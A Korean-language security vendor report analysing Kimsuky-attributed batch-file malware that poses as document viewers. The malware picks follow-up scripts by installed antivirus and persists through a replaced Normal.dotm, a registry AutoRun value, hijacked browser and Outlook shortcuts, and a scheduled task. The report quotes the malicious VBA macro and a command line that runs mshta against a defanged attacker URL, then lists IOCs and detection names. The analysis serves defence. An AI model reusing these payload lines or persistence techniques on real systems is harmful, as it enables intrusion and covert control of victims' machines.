ASEC(AhnLab Security Emergency response Center)은 배치 파일(*.bat) 형태의 악성코드가 유포되고 있음을 확인하였다. 해당 악성코드는 사용자 환경에 설치된 자사 제품을 포함한 백신 프로세스에 따라 다양한 스크립트를 다운로드한다. 악성코드가 사용하는 함수명, 다운로드 URL 파리미터 등을 보아 Kimsuky 그룹에서 유포한 것으로 추정된다.
악성코드의 정확한 유포 경로는 확인되진 않았으나 이메일을 통해 유포되는 것으로 보여진다. 확인된 배치 파일의 파일명은 다음과 같이 워드, 한글 등 문서 프로그램의 뷰어로 보이도록 위장하였다.
| 확인 날짜 | 파일명 |
|---|---|
| 03.22 | docview.bat |
| 03.28 | pdfview.bat |
| 06.12 | hwp.bat |
| 06.20 | docxview.bat |
| 06.21 | pdf.bat |
배치 파일 실행 시 explorer 명령어를 통해 구글 드라이브 및 독스에 접속한다. 이를 통해 구글 독스 및 드라이브에 업로드된 문서 파일이 실행되어 뷰어 프로그램을 실행한 것처럼 보이도록 하였다. 실행되는 문서는 대부분 군사, 통일 관련 내용을 담고 있다.
| 문서 제목 | 접속 URL |
|---|---|
| 미 인도태평양 전략의 군사안보적 검토 – 미 인도태평양 사령부를 중심으로.pdf | hxxps://drive.google.com/file/d/1e41uC2ZTYvTc3CvS6wIKox22AGdP4nFB/view?usp=sharing |
| Consent Form_Princeton Study.pdf | hxxps://drive.google.com/file/d/1tI4J95-7HDGES8e6oHR-wu0cXD8wHPUc/view?usp=sharing |
| 자유민주주의 원칙하 한반도 통일을 이룩하여 번영된 조국 건설해야.pdf | hxxps://docs.google.com/document/d/1NJfvSpdku2PW3gwg0dnoELrlVp3CEGB4mtNIFE4bOVE/edit?usp=sharing |
| NK_nuclear_threat.docx | hxxps://docs.google.com/document/d/1C3h0agp3E6Z4a9z-YxnMTgP3Fd9y8n2C/edit?rtpof=true&sd=true |
| 한미동맹(글로벌국방)-new.hwp | hxxps://drive.google.com/file/d/1rCws6IDhJvynpM3TOSv3IKGWNKXI5uH9/view?usp=sharing |
이후 wmic 명령어를 사용하여 다양한 백신 프로세스를 확인한다. 공격자는 사용자 환경에서 실행중인 백신 프로세스 종류에 따라 다른 스크립트를 다운로드한다.
| 확인하는 AV 제품 (프로세스명) | 다운로드 경로 및 파일명 | 다운로드 URL |
|---|---|---|
| Kaspersky (avpui.exe, avp.exe ) | %appdata%\Microsoft\Templates\Normal.dotm | hxxp://joongang[.]site/pprb/sec/ca.php?na=dot_kasp.gif |
| c:\users\public\videos\video.vbs | hxxp://joongang[.]site/pprb/sec/ca.php?na=reg0.gif | |
| Avast ( avastui.exe, avgui.exe ) | %appdata%\Microsoft\Windows\Start Menu\Programs\Startup\onenote.vbs | hxxp://joongang[.]site/pprb/sec/ca.php?na=sh_ava.gif |
| Ahnlab ( v3 ) | %appdata%\Microsoft\Windows\Start Menu\Programs\Startup\onenote.vbs | hxxps://joongang[.]site/pprb/sec/ca.php?na=sh_vb.gif |
| %appdata%\asdfg.vbs | hxxps://joongang[.]site/pprb/sec/ca.php?na=vbs.gif | |
| 알약 (ayagent.aye ) | %appdata%\asdfg.vbs | hxxps://joongang[.]site/pprb/sec/ca.php?na=vbs.gif |
| 확인되는 제품이 없을 경우 |
- Kaspersky (avpui.exe, avp.exe ) 프로세스가 확인되는 경우
공격자는 기본 문서 템플릿인 Normal.dotm을 교체하기 위해 워드 프로세스를 종료하고 hxxp://joongang[.]site/pprb/sec/ca.php?na=dot_kasp.gif 에서 dotm 파일을 다운로드 하여 Normal.dotm을 교체한다. 다운로드 된 Normal.dotm에는 아래와 같이 cmd.exe를 숨김 창으로 실행하는 VBA 코드가 삽입되어 있다. 현재는 단순히 cmd.exe를 실행하지만 공격자의 의도에 따라 다양한 명령어가 실행될 수 있다.
Sub autoopen()
On Error Resume Next
a = Shell("cmd.exe", 0)
End Sub이후 hxxp://joongang[.]site/pprb/sec/ca.php?na=reg0.gif 에서 video.vbs를 다운로드 한 후 지속적으로 실행될 수 있도록 아래 레지스트리에 등록한다.
- 레지스트리 : HKEY_CURRENT_USER\Software\Microsoft\Command Processor
- 이름 : AutoRun
- 값 : wscript.exe c:\users\public\videos\video.vbs
video.vbs 파일은 실행 시 %appdata%\Microsoft폴더에 ‘qwer.gif’가 존재하면 ‘qwer.bat’으로 파일명을 변경한 후 실행하고 ‘qwer.gif’가 존재하지 않으면 hxxp://joongang[.]site/pprb/sec/d.php?na=battmp 에서 다운로드하여 실행한다.
분석 당시 위 URL에서 확인된 명령어는 다음과 같다.
- Avast ( avastui.exe, avgui.exe ) 프로세스가 확인되는 경우
공격자는 hxxp://joongang[.]site/pprb/sec/ca.php?na=sh_ava.gif 에서 추가 스크립트를 다운로드하여 다운로드 된 스크립트가 지속적으로 실행될 수 있도록 시작 프로그램 폴더에 onenote.vbs 명으로 저장한다.
onenote.vbs 파일은 실행 시 WMI를 활용하여 Win32_Battery 및 Win32_Process의 Description을 수집하고 앞서 설명한 video.vbs 파일을 다운로드 및 런키 등록을 수행한다.
또한, 특정 폴더에 존재하는 브라우저 및 이메일 관련 바로가기(*.lnk) 파일의 위치 또는 속성을 변경하여 사용자가 아웃룩 및 브라우저를 실행하기 위해 해당 바로가기 파일을 클릭하면 공격자가 설정한 악성 명령어가 함께 실행된다.
이를 위해 공격자는 C:\Users\Public\Desktop에 존재하는 브라우저 및 이메일 관련 바로가기 파일을 C:\Users\[user명]\Desktop\[파일명] 으로 이동한다. 이후 속성 아래 표에 적힌 폴더에 존재하고 특정 파일을 실행하는 바로가기 파일의 argument를 수정한다.
| 폴더명 | LNK의 target 파일명 | 변경되는 LNK의 Arguments |
|---|---|---|
| C:\Users\Public\Desktop ( C:\Users\[user명]\Desktop 로 이동되어 속성 변경 ) | msedge.exe chrome.exe outlook.exe whale.exe firefox.exe | cmd.exe /c start [파일명] [기존 Arguments] [공격자가 설정한 명령어] |
| C:\Users\[user명]\Desktop | ||
| %appdata%\Microsoft\Internet Explorer\Quick Launch” |
분석 당시 Avast 프로세스가 확인되는 경우에 다운로드 된 onenote.vbs에는 [공격자가 설정한 명령어]가 존재하지 않았지만 공격자의 의도에 따라 다양한 악성 명령어가 실행 될 수 있다.
이후 앞서 수집한 정보를 hxxps://joongang[.]site/pprb/sec/r.php 로 전송한다. 전송되는 데이터는 다음과 같다.
| [배터리 정보] [프로세스 정보] ENTER bin short ok |
- Ahnlab ( v3 ) 프로세스가 확인되는 경우
Avast 프로세스가 확인되는 경우와 유사하며 hxxps://joongang[.]site/pprb/sec/ca.php?na=sh_vb.gif에서 추가 스크립트 파일을 다운로드하여 시작 프로그램 폴더에 onenote.vbs 파일명으로 저장한다.
위 스크립트 파일은 앞서 설명한 onenote.vbs(?na=sh_ava.gif) 와 동일한 기능을 수행하지만 hxxps://joongang[.]site/pprb/sec/ca.php?na=sh_vb.gif 에서 다운로드 된 onenote.vbs에는 바로가기 파일 속성 변경 시 변경되는 Arguments에 포함되는 [공격자가 설정한 명령어]가 확인되었다.
& echo Set ws = CreateObject(""WScript.Shell""):
a=ws.run(""mshta.exe hxxps://joongang[.]site/pprb/sec/t1.hta"",0,false) > ""%appdata%\1.vbs""
& start wscript.exe /b ""%appdata%\1.vbs
따라서 사용자가 브라우저 및 아웃룩의 바로가기 파일을 실행할 때 마다 hxxps://joongang[.]site/pprb/sec/t1.hta에 있는 스크립트가 %appdata%\1.vbs로 저장 및 실행된다. 분석 당시 해당 URL에는 다음과 같이 윈도우 창을 닫는 명령어가 존재하였다.
On Error Resume Next
window.close()이후 Kaspersky (avpui.exe, avp.exe ) 및 Avast ( avastui.exe, avgui.exe ) 프로세스가 확인되는 경우를 제외하고 hxxps://joongang[.]site/pprb/sec/ca.php?na=vbs.gif 에서 추가 스크립트를 다운로드 하여 %appdata% 폴더에 asdfg.vbs 로 저장한다.
다운로드 된 asdfg.vbs 파일은 CleanupTemporaryState명으로 작업스케줄러에 등록하여 41분 마다 실행되도록 한다.
asdfg.vbs 파일은 video.vbs와 동일하게 hxxps://joongang[.]site/pprb/sec/d.php?na=battmp에서 추가 스크립트를 다운로드하여 실행한다.
분석 당시 실행 파일 다운로드 등의 행위는 존재하지 않았지만 다양한 스크립트를 다운로드하여 실행하는 만큼 스크립트에 존재하는 명령에 따라 확인되지 않은 추가 악성 행위가 실행될 수 있다. 또한, 공격자는 기본 문서 템플릿인 Normal.dotm을 교체하고, 브라우저 및 이메일 관련 바로가기 파일을 수정하였다. 이로 인해 사용자는 워드 문서와 크롬 등 인터넷 브라우저 프로그램, 아웃룩 프로그램의 바로가기(*.lnk) 파일 실행 시 악성 스크립트가 받아질 수 있어 각별한 주의가 필요하다.
[파일 진단]
Downloader/BAT.Generic.S2300 (2023.06.26.03)
Trojan/VBS.Agent.SC190255 (2023.06.30.00)
Trojan/VBS.Agent.SC190256 (2023.06.30.00)
Downloader/VBS.Agent.SC190254 (2023.06.30.00)
[행위 진단]
Execution/MDP.Curl.M4675
Execution/MDP.Curl.M11183
Execution/EDR.Curl.M11182
[IOC]
MD5
7d79901b01075e29d8505e72d225ff52
00119ed01689e76cb7f33646693ecd6a
8536d838dcdd026c57187ec2c3aec0f6
a7ac7d100184078c2aa5645552794c19
URL
hxxp://joongang.site/pprb/sec/
hxxp://joongang.site/doc/
hxxp://joongang.site/docx/
hxxp://namsouth.com/gopprb/OpOpO/
hxxp://staradvertiser.store/signal/
[References]
https://www.sentinelone.com/labs/kimsuky-evolves-reconnaissance-capabilities-in-new-global-campaign/
연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.
Categories:악성코드 정보